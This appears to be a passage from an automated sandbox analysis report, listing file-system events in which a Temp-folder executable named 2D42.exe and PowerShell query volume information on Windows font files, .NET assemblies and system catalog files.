Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2D42.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
